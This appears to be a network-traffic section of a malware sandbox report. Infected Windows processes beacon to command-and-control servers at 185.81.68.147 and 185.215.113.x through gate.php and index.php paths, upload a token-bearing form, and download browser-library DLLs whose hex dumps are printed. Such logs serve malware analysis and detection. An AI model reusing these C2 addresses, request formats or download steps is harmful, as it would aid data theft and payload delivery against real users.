                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        58192.168.2.1050071185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:34.268636942 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:34.388673067 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:35.902717113 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:34 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        59192.168.2.1050072185.81.68.14780
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:34.653986931 CET264OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:36.018497944 CET257INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:35 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 40
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 35 32 36 62 39 30 39 36 37 61 31 62 37 35 39 39 36 34 30 35 34 64 32 30 62 37 36 65 36 66 34 66 35 37 34 31 63 31 64 62
                                                                                                                                                                                                                                                                                        Data Ascii: 526b90967a1b759964054d20b76e6f4f5741c1db


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        60192.168.2.1050075185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:36.138901949 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:36.259902954 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:37.966665983 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:36 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        61192.168.2.1050076185.81.68.14780
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:36.148298979 CET284OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:36.271923065 CET10OUTData Raw: 72 57 42 2b 57 5a 5c 55 43 12
                                                                                                                                                                                                                                                                                        Data Ascii: rWB+WZ\UC


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        62192.168.2.1050078185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:37.772818089 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 31 34 34 34 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                        Data Ascii: d1=1014446001&unit=246122658369
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:39.185091019 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:38 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        63192.168.2.1050080185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:38.198062897 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:38.318334103 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:39.876677990 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:38 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        64192.168.2.1050084185.215.113.206807020C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:39.788738012 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----JEBKEHJJDAAAAKECBGHD
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 363
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: ------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="file"------JEBKEHJJDAAAAKECBGHD--
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:41.591861010 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:40 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:43.856801987 CET94OUTGET /68b591d6548ec281/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.295047998 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:44 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                        ETag: "a7550-5e7e950876500"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Content-Length: 685392
                                                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.295073986 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b
                                                                                                                                                                                                                                                                                        Data Ascii: UhOt8]h1]UWVEtu}U
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.297791004 CET1236INData Raw: 10 8b 4d 0c 85 ff 74 22 f2 0f 10 07 f2 0f 11 80 30 01 00 00 eb 28 68 05 e0 ff ff e8 7f 0b 08 00 83 c4 04 b8 ff ff ff ff eb 26 c7 80 34 01 00 00 a6 a6 a6 a6 c7 80 30 01 00 00 a6 a6 a6 a6 6a 10 56 6a 00 6a 00 52 51 50 e8 3f 96 06 00 83 c4 1c 5e 5f
                                                                                                                                                                                                                                                                                        Data Ascii: Mt"0(h&40jVjjRQP?^_]USWVhO?t081tkEU]Mt0%h1<40jRjjPQWt8^
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.297813892 CET1236INData Raw: 0f 84 8d 02 00 00 89 54 24 34 89 44 24 30 89 f8 83 e0 f8 50 e8 88 06 08 00 83 c4 04 85 c0 0f 84 7c 02 00 00 89 c3 89 f8 c1 ef 03 8d 4f ff 89 4c 24 38 50 56 53 e8 27 07 08 00 83 c4 0c f2 0f 10 03 f2 0f 11 44 24 40 8d 04 3f 83 c0 fe 8d 04 40 89 c1
                                                                                                                                                                                                                                                                                        Data Ascii: T$4D$0P|OL$8PVS'D$@?@L$L$D$D$D$$D$ 11\$($D$T$L$D$D$t$8D$D$@L$T$|$ L$$
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.297818899 CET248INData Raw: 1c ff 75 18 53 50 56 8d 45 e0 50 e8 b4 fa ff ff 83 c4 18 89 c7 85 ff 0f 85 6f 01 00 00 b9 01 e0 ff ff 39 5d dc 0f 85 53 01 00 00 8b 55 e0 0f ca b8 a6 59 59 a6 29 d0 81 c2 5a a6 a6 59 09 c2 0f b6 45 e4 0f b6 4d e5 c1 e0 10 c1 e1 08 09 c1 0f b6 45
                                                                                                                                                                                                                                                                                        Data Ascii: uSPVEPo9]SUYY)ZYEME]M)19DEEE|0)U|2!!)]|3)|3!)}|7
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.300488949 CET1236INData Raw: 21 d7 b8 05 00 00 00 29 c8 c1 f8 1f f7 d0 8b 55 1c 80 7c 32 f2 01 19 db 09 c3 b8 06 00 00 00 29 c8 c1 f8 1f 80 7c 32 f1 01 f7 d0 19 d2 09 c2 21 da 21 fa b8 07 00 00 00 29 c8 c1 f8 1f f7 d0 8b 4d 1c 80 7c 31 f0 01 19 c9 09 c1 85 ca 74 2f 8b 45 10
                                                                                                                                                                                                                                                                                        Data Ascii: !)U|2)|2!!)M|1t/EU;U]w"1E9t:RVP -:]QsE9uSjPEtSP\M1$^_[]USWVut:}t$FHjS
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.300539970 CET1236INData Raw: 08 8b 55 18 8b 4d 14 8b 5d 0c 8b 75 08 8b 3e 8b 46 04 39 d8 74 3a 8d 4e 08 8b 56 08 c7 46 08 00 00 00 00 85 ff 89 4d ec 89 55 f0 74 48 8b 48 0c ff 15 00 80 0a 10 6a 01 57 ff d1 83 c4 08 68 0c 01 00 00 6a 00 56 e8 34 fc 07 00 83 c4 0c eb 25 85 ff
                                                                                                                                                                                                                                                                                        Data Ascii: UM]u>F9t:NVFMUtHHjWhjV4%tUVPdnFEFEF^Kt=Uuu#t>t FHjWEM1^_[]USWVu>
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.300549030 CET248INData Raw: 00 00 8d bd f0 fe ff ff 68 00 01 00 00 68 20 21 08 10 89 b5 ec fe ff ff 56 e8 cf f7 07 00 83 c4 0c bb 00 01 00 00 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 8b 75 0c 56 ff 75 08 57 e8 ac f7 07 00 83 c4 0c 01 f7 29 f3 39 f3 77 e8 53 ff 75 08 57 e8
                                                                                                                                                                                                                                                                                        Data Ascii: hh !Vf.@uVuW)9wSuWT>\>=t%>>fM1^_[]U}th
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.303679943 CET1236INData Raw: 07 00 83 c4 08 5d c3 cc cc cc cc cc 55 89 e5 56 8b 75 1c 8b 45 14 39 f0 73 14 68 03 e0 ff ff e8 3b f6 07 00 83 c4 04 b8 ff ff ff ff eb 16 8b 55 0c 8b 4d 08 56 ff 75 18 50 ff 75 10 e8 0b 00 00 00 83 c4 10 5e 5d c3 cc cc cc cc cc 55 89 e5 53 57 56
                                                                                                                                                                                                                                                                                        Data Ascii: ]UVuE9sh;UMVuPu^]USWV4MEE9EshyU}]E}}aM}$7$7u2M$E}
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.303688049 CET1236INData Raw: f2 17 66 0f 6f 2d e0 20 08 10 66 0f fe d5 f3 0f 5b d2 66 0f 70 e1 f5 66 0f f4 ca 66 0f 70 d2 f5 66 0f f4 d4 66 0f 6f e0 66 0f fe 25 00 21 08 10 66 0f 70 c9 e8 66 0f 70 d2 e8 66 0f 62 ca 66 0f 6e 54 07 04 66 0f 60 d3 66 0f 61 d3 66 0f eb cf 66 0f
                                                                                                                                                                                                                                                                                        Data Ascii: fo- f[fpffpffof%!fpfpfbfnTf`faffrf[fpffpffpfpfbff!~sMEMEUxEUMfEMUTFtFM
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.309039116 CET248INData Raw: 4d cc 8b 45 e8 8b 55 ec 01 d0 83 c0 03 0f b6 c0 8b 55 f0 0f b6 14 02 00 d3 0f b6 f3 8b 7d f0 8a 34 37 8b 7d f0 88 34 07 8b 45 f0 88 14 30 00 d6 0f b6 c6 8b 55 f0 0f b6 04 02 c1 e0 10 09 c8 8b 4d e8 8b 55 ec 01 d1 83 c1 04 0f b6 c9 8b 55 f0 0f b6
                                                                                                                                                                                                                                                                                        Data Ascii: MEUU}47}4E0UMUU}47}4M1uU3UMEM}}Eu;uUM}Et}E
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:45.876698017 CET94OUTGET /68b591d6548ec281/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:46.314449072 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:46 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                        ETag: "94750-5e7e950876500"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Content-Length: 608080
                                                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:48.207926989 CET95OUTGET /68b591d6548ec281/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:48.645143986 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:48 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                        ETag: "6dde8-5e7e950876500"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Content-Length: 450024
                                                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:49.865596056 CET91OUTGET /68b591d6548ec281/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:50.303821087 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:50 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                        ETag: "1f3950-5e7e950876500"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Content-Length: 2046288
                                                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
